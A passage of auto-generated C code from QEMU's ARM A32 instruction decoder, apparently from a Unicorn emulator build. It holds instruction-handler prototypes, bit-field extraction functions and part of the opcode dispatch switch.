arg_LDRSBT_ri; static bool trans_LDRSBT_ri(DisasContext *ctx, arg_LDRSBT_ri *a); typedef arg_ldst_ri arg_LDRSHT_ri; static bool trans_LDRSHT_ri(DisasContext *ctx, arg_LDRSHT_ri *a); typedef arg_ldst_ri arg_STR_ri; static bool trans_STR_ri(DisasContext *ctx, arg_STR_ri *a); typedef arg_ldst_ri arg_STRB_ri; static bool trans_STRB_ri(DisasContext *ctx, arg_STRB_ri *a); typedef arg_ldst_ri arg_LDR_ri; static bool trans_LDR_ri(DisasContext *ctx, arg_LDR_ri *a); typedef arg_ldst_ri arg_LDRB_ri; static bool trans_LDRB_ri(DisasContext *ctx, arg_LDRB_ri *a); typedef arg_ldst_ri arg_STRT_ri; static bool trans_STRT_ri(DisasContext *ctx, arg_STRT_ri *a); typedef arg_ldst_ri arg_STRBT_ri; static bool trans_STRBT_ri(DisasContext *ctx, arg_STRBT_ri *a); typedef arg_ldst_ri arg_LDRT_ri; static bool trans_LDRT_ri(DisasContext *ctx, arg_LDRT_ri *a); typedef arg_ldst_ri arg_LDRBT_ri; static bool trans_LDRBT_ri(DisasContext *ctx, arg_LDRBT_ri *a); typedef arg_disas_a3226 arg_SWP; static bool trans_SWP(DisasContext *ctx, arg_SWP *a); typedef arg_disas_a3226 arg_SWPB; static bool trans_SWPB(DisasContext *ctx, arg_SWPB *a); typedef arg_strex arg_STREX; static bool trans_STREX(DisasContext *ctx, arg_STREX *a); typedef arg_strex arg_STREXD_a32; static bool trans_STREXD_a32(DisasContext *ctx, arg_STREXD_a32 *a); typedef arg_strex arg_STREXB; static bool trans_STREXB(DisasContext *ctx, arg_STREXB *a); typedef arg_strex arg_STREXH; static bool trans_STREXH(DisasContext *ctx, arg_STREXH *a); typedef arg_strex arg_STLEX; static bool trans_STLEX(DisasContext *ctx, arg_STLEX *a); typedef arg_strex arg_STLEXD_a32; static bool trans_STLEXD_a32(DisasContext *ctx, arg_STLEXD_a32 *a); typedef arg_strex arg_STLEXB; static bool trans_STLEXB(DisasContext *ctx, arg_STLEXB *a); typedef arg_strex arg_STLEXH; static bool trans_STLEXH(DisasContext *ctx, arg_STLEXH *a); typedef arg_ldrex arg_STL; static bool trans_STL(DisasContext *ctx, arg_STL *a); typedef arg_ldrex arg_STLB; static bool trans_STLB(DisasContext *ctx, arg_STLB *a); typedef arg_ldrex arg_STLH; static bool trans_STLH(DisasContext *ctx, arg_STLH *a); typedef arg_ldrex arg_LDREX; static bool trans_LDREX(DisasContext *ctx, arg_LDREX *a); typedef arg_ldrex arg_LDREXD_a32; static bool trans_LDREXD_a32(DisasContext *ctx, arg_LDREXD_a32 *a); typedef arg_ldrex arg_LDREXB; static bool trans_LDREXB(DisasContext *ctx, arg_LDREXB *a); typedef arg_ldrex arg_LDREXH; static bool trans_LDREXH(DisasContext *ctx, arg_LDREXH *a); typedef arg_ldrex arg_LDAEX; static bool trans_LDAEX(DisasContext *ctx, arg_LDAEX *a); typedef arg_ldrex arg_LDAEXD_a32; static bool trans_LDAEXD_a32(DisasContext *ctx, arg_LDAEXD_a32 *a); typedef arg_ldrex arg_LDAEXB; static bool trans_LDAEXB(DisasContext *ctx, arg_LDAEXB *a); typedef arg_ldrex arg_LDAEXH; static bool trans_LDAEXH(DisasContext *ctx, arg_LDAEXH *a); typedef arg_ldrex arg_LDA; static bool trans_LDA(DisasContext *ctx, arg_LDA *a); typedef arg_ldrex arg_LDAB; static bool trans_LDAB(DisasContext *ctx, arg_LDAB *a); typedef arg_ldrex arg_LDAH; static bool trans_LDAH(DisasContext *ctx, arg_LDAH *a); typedef arg_rrrr arg_USADA8; static bool trans_USADA8(DisasContext *ctx, arg_USADA8 *a); typedef arg_bfx arg_SBFX; static bool trans_SBFX(DisasContext *ctx, arg_SBFX *a); typedef arg_bfx arg_UBFX; static bool trans_UBFX(DisasContext *ctx, arg_UBFX *a); typedef arg_bfi arg_BFCI; static bool trans_BFCI(DisasContext *ctx, arg_BFCI *a); typedef arg_empty arg_UDF; static bool trans_UDF(DisasContext *ctx, arg_UDF *a); typedef arg_rrr arg_SADD16; static bool trans_SADD16(DisasContext *ctx, arg_SADD16 *a); typedef arg_rrr arg_SASX; static bool trans_SASX(DisasContext *ctx, arg_SASX *a); typedef arg_rrr arg_SSAX; static bool trans_SSAX(DisasContext *ctx, arg_SSAX *a); typedef arg_rrr arg_SSUB16; static bool trans_SSUB16(DisasContext *ctx, arg_SSUB16 *a); typedef arg_rrr arg_SADD8; static bool trans_SADD8(DisasContext *ctx, arg_SADD8 *a); typedef arg_rrr arg_SSUB8; static bool trans_SSUB8(DisasContext *ctx, arg_SSUB8 *a); typedef arg_rrr arg_QADD16; static bool trans_QADD16(DisasContext *ctx, arg_QADD16 *a); typedef arg_rrr arg_QASX; static bool trans_QASX(DisasContext *ctx, arg_QASX *a); typedef arg_rrr arg_QSAX; static bool trans_QSAX(DisasContext *ctx, arg_QSAX *a); typedef arg_rrr arg_QSUB16; static bool trans_QSUB16(DisasContext *ctx, arg_QSUB16 *a); typedef arg_rrr arg_QADD8; static bool trans_QADD8(DisasContext *ctx, arg_QADD8 *a); typedef arg_rrr arg_QSUB8; static bool trans_QSUB8(DisasContext *ctx, arg_QSUB8 *a); typedef arg_rrr arg_SHADD16; static bool trans_SHADD16(DisasContext *ctx, arg_SHADD16 *a); typedef arg_rrr arg_SHASX; static bool trans_SHASX(DisasContext *ctx, arg_SHASX *a); typedef arg_rrr arg_SHSAX; static bool trans_SHSAX(DisasContext *ctx, arg_SHSAX *a); typedef arg_rrr arg_SHSUB16; static bool trans_SHSUB16(DisasContext *ctx, arg_SHSUB16 *a); typedef arg_rrr arg_SHADD8; static bool trans_SHADD8(DisasContext *ctx, arg_SHADD8 *a); typedef arg_rrr arg_SHSUB8; static bool trans_SHSUB8(DisasContext *ctx, arg_SHSUB8 *a); typedef arg_rrr arg_UADD16; static bool trans_UADD16(DisasContext *ctx, arg_UADD16 *a); typedef arg_rrr arg_UASX; static bool trans_UASX(DisasContext *ctx, arg_UASX *a); typedef arg_rrr arg_USAX; static bool trans_USAX(DisasContext *ctx, arg_USAX *a); typedef arg_rrr arg_USUB16; static bool trans_USUB16(DisasContext *ctx, arg_USUB16 *a); typedef arg_rrr arg_UADD8; static bool trans_UADD8(DisasContext *ctx, arg_UADD8 *a); typedef arg_rrr arg_USUB8; static bool trans_USUB8(DisasContext *ctx, arg_USUB8 *a); typedef arg_rrr arg_UQADD16; static bool trans_UQADD16(DisasContext *ctx, arg_UQADD16 *a); typedef arg_rrr arg_UQASX; static bool trans_UQASX(DisasContext *ctx, arg_UQASX *a); typedef arg_rrr arg_UQSAX; static bool trans_UQSAX(DisasContext *ctx, arg_UQSAX *a); typedef arg_rrr arg_UQSUB16; static bool trans_UQSUB16(DisasContext *ctx, arg_UQSUB16 *a); typedef arg_rrr arg_UQADD8; static bool trans_UQADD8(DisasContext *ctx, arg_UQADD8 *a); typedef arg_rrr arg_UQSUB8; static bool trans_UQSUB8(DisasContext *ctx, arg_UQSUB8 *a); typedef arg_rrr arg_UHADD16; static bool trans_UHADD16(DisasContext *ctx, arg_UHADD16 *a); typedef arg_rrr arg_UHASX; static bool trans_UHASX(DisasContext *ctx, arg_UHASX *a); typedef arg_rrr arg_UHSAX; static bool trans_UHSAX(DisasContext *ctx, arg_UHSAX *a); typedef arg_rrr arg_UHSUB16; static bool trans_UHSUB16(DisasContext *ctx, arg_UHSUB16 *a); typedef arg_rrr arg_UHADD8; static bool trans_UHADD8(DisasContext *ctx, arg_UHADD8 *a); typedef arg_rrr arg_UHSUB8; static bool trans_UHSUB8(DisasContext *ctx, arg_UHSUB8 *a); typedef arg_pkh arg_PKH; static bool trans_PKH(DisasContext *ctx, arg_PKH *a); typedef arg_sat arg_SSAT; static bool trans_SSAT(DisasContext *ctx, arg_SSAT *a); typedef arg_sat arg_USAT; static bool trans_USAT(DisasContext *ctx, arg_USAT *a); typedef arg_sat arg_SSAT16; static bool trans_SSAT16(DisasContext *ctx, arg_SSAT16 *a); typedef arg_sat arg_USAT16; static bool trans_USAT16(DisasContext *ctx, arg_USAT16 *a); typedef arg_rrr_rot arg_SXTAB16; static bool trans_SXTAB16(DisasContext *ctx, arg_SXTAB16 *a); typedef arg_rrr_rot arg_SXTAB; static bool trans_SXTAB(DisasContext *ctx, arg_SXTAB *a); typedef arg_rrr_rot arg_SXTAH; static bool trans_SXTAH(DisasContext *ctx, arg_SXTAH *a); typedef arg_rrr_rot arg_UXTAB16; static bool trans_UXTAB16(DisasContext *ctx, arg_UXTAB16 *a); typedef arg_rrr_rot arg_UXTAB; static bool trans_UXTAB(DisasContext *ctx, arg_UXTAB *a); typedef arg_rrr_rot arg_UXTAH; static bool trans_UXTAH(DisasContext *ctx, arg_UXTAH *a); typedef arg_rrr arg_SEL; static bool trans_SEL(DisasContext *ctx, arg_SEL *a); typedef arg_rr arg_REV; static bool trans_REV(DisasContext *ctx, arg_REV *a); typedef arg_rr arg_REV16; static bool trans_REV16(DisasContext *ctx, arg_REV16 *a); typedef arg_rr arg_REVSH; static bool trans_REVSH(DisasContext *ctx, arg_REVSH *a); typedef arg_rr arg_RBIT; static bool trans_RBIT(DisasContext *ctx, arg_RBIT *a); typedef arg_rrrr arg_SMLAD; static bool trans_SMLAD(DisasContext *ctx, arg_SMLAD *a); typedef arg_rrrr arg_SMLADX; static bool trans_SMLADX(DisasContext *ctx, arg_SMLADX *a); typedef arg_rrrr arg_SMLSD; static bool trans_SMLSD(DisasContext *ctx, arg_SMLSD *a); typedef arg_rrrr arg_SMLSDX; static bool trans_SMLSDX(DisasContext *ctx, arg_SMLSDX *a); typedef arg_rrr arg_SDIV; static bool trans_SDIV(DisasContext *ctx, arg_SDIV *a); typedef arg_rrr arg_UDIV; static bool trans_UDIV(DisasContext *ctx, arg_UDIV *a); typedef arg_rrrr arg_SMLALD; static bool trans_SMLALD(DisasContext *ctx, arg_SMLALD *a); typedef arg_rrrr arg_SMLALDX; static bool trans_SMLALDX(DisasContext *ctx, arg_SMLALDX *a); typedef arg_rrrr arg_SMLSLD; static bool trans_SMLSLD(DisasContext *ctx, arg_SMLSLD *a); typedef arg_rrrr arg_SMLSLDX; static bool trans_SMLSLDX(DisasContext *ctx, arg_SMLSLDX *a); typedef arg_rrrr arg_SMMLA; static bool trans_SMMLA(DisasContext *ctx, arg_SMMLA *a); typedef arg_rrrr arg_SMMLAR; static bool trans_SMMLAR(DisasContext *ctx, arg_SMMLAR *a); typedef arg_rrrr arg_SMMLS; static bool trans_SMMLS(DisasContext *ctx, arg_SMMLS *a); typedef arg_rrrr arg_SMMLSR; static bool trans_SMMLSR(DisasContext *ctx, arg_SMMLSR *a); typedef arg_ldst_block arg_STM; static bool trans_STM(DisasContext *ctx, arg_STM *a); typedef arg_ldst_block arg_LDM_a32; static bool trans_LDM_a32(DisasContext *ctx, arg_LDM_a32 *a); typedef arg_i arg_B; static bool trans_B(DisasContext *ctx, arg_B *a); typedef arg_i arg_BL; static bool trans_BL(DisasContext *ctx, arg_BL *a); typedef arg_i arg_SVC; static bool trans_SVC(DisasContext *ctx, arg_SVC *a); static void disas_a32_extract_S_xri_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->rot = times_2(ctx, extract32(insn, 8, 4)); a->rd = 0; a->s = 1; } static void disas_a32_extract_S_xrr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->shim = extract32(insn, 7, 5); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->s = 1; a->rd = 0; } static void disas_a32_extract_S_xrr_shr(DisasContext *ctx, arg_s_rrr_shr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rs = extract32(insn, 8, 4); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->rd = 0; a->s = 1; } static void disas_a32_extract_bfx(DisasContext *ctx, arg_bfx *a, uint32_t insn) { a->widthm1 = extract32(insn, 16, 5); a->rd = extract32(insn, 12, 4); a->lsb = extract32(insn, 7, 5); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_branch(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = times_4(ctx, sextract32(insn, 0, 24)); } static void disas_a32_extract_disas_a32_Fmt_16(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void disas_a32_extract_disas_a32_Fmt_20(DisasContext *ctx, arg_mrs_bank *a, uint32_t insn) { a->r = extract32(insn, 22, 1); a->rd = extract32(insn, 12, 4); a->sysm = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 8, 1)); } static void disas_a32_extract_disas_a32_Fmt_21(DisasContext *ctx, arg_msr_bank *a, uint32_t insn) { a->r = extract32(insn, 22, 1); a->rn = extract32(insn, 0, 4); a->sysm = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 8, 1)); } static void disas_a32_extract_disas_a32_Fmt_22(DisasContext *ctx, arg_mrs_reg *a, uint32_t insn) { a->r = extract32(insn, 22, 1); a->rd = extract32(insn, 12, 4); } static void disas_a32_extract_disas_a32_Fmt_23(DisasContext *ctx, arg_msr_reg *a, uint32_t insn) { a->r = extract32(insn, 22, 1); a->mask = extract32(insn, 16, 4); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_disas_a32_Fmt_24(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = extract32(insn, 0, 4); } static void disas_a32_extract_disas_a32_Fmt_42(DisasContext *ctx, arg_bfi *a, uint32_t insn) { a->msb = extract32(insn, 16, 5); a->rd = extract32(insn, 12, 4); a->lsb = extract32(insn, 7, 5); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_disas_a32_Fmt_43(DisasContext *ctx, arg_pkh *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->imm = extract32(insn, 7, 5); a->tb = extract32(insn, 6, 1); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_disas_a32_Fmt_48(DisasContext *ctx, arg_ldst_block *a, uint32_t insn) { a->b = extract32(insn, 24, 1); a->i = extract32(insn, 23, 1); a->u = extract32(insn, 22, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->list = extract32(insn, 0, 16); } static void disas_a32_extract_disas_a32_Fmt_50(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = extract32(insn, 0, 24); } static void disas_a32_extract_i16(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 8, 12)); } static void disas_a32_extract_ldrex(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = 0; a->rt2 = 15; } static void disas_a32_extract_ldst_ri12_p0w1(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_ri12_p1w(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 1; } static void disas_a32_extract_ldst_ri12_pw0(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 12); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_ri8_p0w1(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 8, 4)); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_ri8_p1w(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 8, 4)); a->p = 1; } static void disas_a32_extract_ldst_ri8_pw0(DisasContext *ctx, arg_ldst_ri *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 8, 4)); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_rr_p0w1(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); a->p = 0; a->w = 0; a->shimm = 0; a->shtype = 0; } static void disas_a32_extract_ldst_rr_p1w(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); a->p = 1; a->shimm = 0; a->shtype = 0; } static void disas_a32_extract_ldst_rr_pw0(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); a->p = 0; a->w = 0; a->shimm = 0; a->shtype = 0; } static void disas_a32_extract_ldst_rs_p0w1(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->shimm = extract32(insn, 7, 5); a->shtype = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->p = 0; a->w = 0; } static void disas_a32_extract_ldst_rs_p1w(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->w = extract32(insn, 21, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->shimm = extract32(insn, 7, 5); a->shtype = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->p = 1; } static void disas_a32_extract_ldst_rs_pw0(DisasContext *ctx, arg_ldst_rr *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->shimm = extract32(insn, 7, 5); a->shtype = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->p = 0; a->w = 0; } static void disas_a32_extract_mov16(DisasContext *ctx, arg_ri *a, uint32_t insn) { a->rd = extract32(insn, 12, 4); a->imm = deposit32(extract32(insn, 0, 12), 12, 20, extract32(insn, 16, 4)); } static void disas_a32_extract_msr_i(DisasContext *ctx, arg_msr_i *a, uint32_t insn) { a->mask = extract32(insn, 16, 4); a->rot = extract32(insn, 8, 4); a->imm = extract32(insn, 0, 8); } static void disas_a32_extract_rd0mn(DisasContext *ctx, arg_rrrr *a, uint32_t insn) { a->rd = extract32(insn, 16, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); a->ra = 0; } static void disas_a32_extract_rdamn(DisasContext *ctx, arg_rrrr *a, uint32_t insn) { a->rd = extract32(insn, 16, 4); a->ra = extract32(insn, 12, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_rdm(DisasContext *ctx, arg_rr *a, uint32_t insn) { a->rd = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_rdmn(DisasContext *ctx, arg_rrr *a, uint32_t insn) { a->rd = extract32(insn, 16, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_rm(DisasContext *ctx, arg_r *a, uint32_t insn) { a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_rndm(DisasContext *ctx, arg_rrr *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_rrr_rot(DisasContext *ctx, arg_rrr_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rot = extract32(insn, 10, 2); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_s_rd0mn(DisasContext *ctx, arg_s_rrrr *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 16, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); a->ra = 0; } static void disas_a32_extract_s_rdamn(DisasContext *ctx, arg_s_rrrr *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 16, 4); a->ra = extract32(insn, 12, 4); a->rm = extract32(insn, 8, 4); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_s_rri_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 8); a->rot = times_2(ctx, extract32(insn, 8, 4)); } static void disas_a32_extract_s_rrr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->shim = extract32(insn, 7, 5); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_s_rrr_shr(DisasContext *ctx, arg_s_rrr_shr *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rs = extract32(insn, 8, 4); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); } static void disas_a32_extract_s_rxi_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 12, 4); a->imm = extract32(insn, 0, 8); a->rot = times_2(ctx, extract32(insn, 8, 4)); a->rn = 0; } static void disas_a32_extract_s_rxr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 12, 4); a->shim = extract32(insn, 7, 5); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->rn = 0; } static void disas_a32_extract_s_rxr_shr(DisasContext *ctx, arg_s_rrr_shr *a, uint32_t insn) { a->s = extract32(insn, 20, 1); a->rd = extract32(insn, 12, 4); a->rs = extract32(insn, 8, 4); a->shty = extract32(insn, 5, 2); a->rm = extract32(insn, 0, 4); a->rn = 0; } static void disas_a32_extract_sat(DisasContext *ctx, arg_sat *a, uint32_t insn) { a->satimm = extract32(insn, 16, 5); a->rd = extract32(insn, 12, 4); a->imm = extract32(insn, 7, 5); a->sh = extract32(insn, 6, 1); a->rn = extract32(insn, 0, 4); } static void disas_a32_extract_sat16(DisasContext *ctx, arg_sat *a, uint32_t insn) { a->satimm = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rn = extract32(insn, 0, 4); a->imm = 0; a->sh = 0; } static void disas_a32_extract_stl(DisasContext *ctx, arg_ldrex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 0, 4); a->imm = 0; a->rt2 = 15; } static void disas_a32_extract_strex(DisasContext *ctx, arg_strex *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 12, 4); a->rt = extract32(insn, 0, 4); a->imm = 0; a->rt2 = 15; } static void disas_a32_extract_swp(DisasContext *ctx, arg_disas_a3226 *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->rt2 = extract32(insn, 0, 4); } static bool disas_a32(DisasContext *ctx, uint32_t insn) { union { arg_bfi f_bfi; arg_bfx f_bfx; arg_disas_a3226 f_disas_a3226; arg_empty f_empty; arg_i f_i; arg_ldrex f_ldrex; arg_ldst_block f_ldst_block; arg_ldst_ri f_ldst_ri; arg_ldst_rr f_ldst_rr; arg_mrs_bank f_mrs_bank; arg_mrs_reg f_mrs_reg; arg_msr_bank f_msr_bank; arg_msr_i f_msr_i; arg_msr_reg f_msr_reg; arg_pkh f_pkh; arg_r f_r; arg_ri f_ri; arg_rr f_rr; arg_rrr f_rrr; arg_rrr_rot f_rrr_rot; arg_rrrr f_rrrr; arg_s_rri_rot f_s_rri_rot; arg_s_rrr_shi f_s_rrr_shi; arg_s_rrr_shr f_s_rrr_shr; arg_s_rrrr f_s_rrrr; arg_sat f_sat; arg_strex f_strex; } u; switch ((insn >> 25) & 0x7) { case 0x0: /* ....000. ........ ........ ........ */ switch (insn & 0x01000010) { case 0x00000000: /* ....0000 ........ ........ ...0.... */ disas_a32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); switch ((insn >> 21) & 0x7) { case 0x0: /* ....0000 000..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:60 */ if (trans_AND_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* ....0000 001..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:61 */ if (trans_EOR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x2: /* ....0000 010..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:62 */ if (trans_SUB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x3: /* ....0000 011..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:63 */ if (trans_RSB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x4: /* ....0000 100..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:64 */ if (trans_ADD_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x5: /* ....0000 101..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:65 */ if (trans_ADC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x6: /* ....0000 110..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:66 */ if (trans_SBC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x7: /* ....0000 111..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:67 */ if (trans_RSC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x00000010: /* ....0000 ........ ........ ...1.... */ switch (insn & 0x00600080) { case 0x00000000: /* ....0000 .00..... ........ 0..1.... */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 000..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:92 */ if (trans_AND_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* ....0000 100..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:96 */ if (trans_ADD_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x00000080: /* ....0000 .00..... ........ 1..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0000 .00..... ........ 1001.... */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 000..... ........ 1001.... */ disas_a32_extract_s_rd0mn(ctx, &u.f_s_rrrr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0000 000..... 0000.... 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:144 */ if (trans_MUL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 100..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:148 */ disas_a32_extract_s_rdamn(ctx, &u.f_s_rrrr, insn); if (trans_UMULL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 .00..... ........ 1011.... */ disas_a32_extract_ldst_rr_pw0(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00000000: /* ....0000 .000.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:249 */ if (trans_STRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100000: /* ....0000 .001.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:258 */ if (trans_LDRH_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x2: /* ....0000 .00..... ........ 1101.... */ disas_a32_extract_ldst_rr_pw0(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00000000: /* ....0000 .000.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:252 */ if 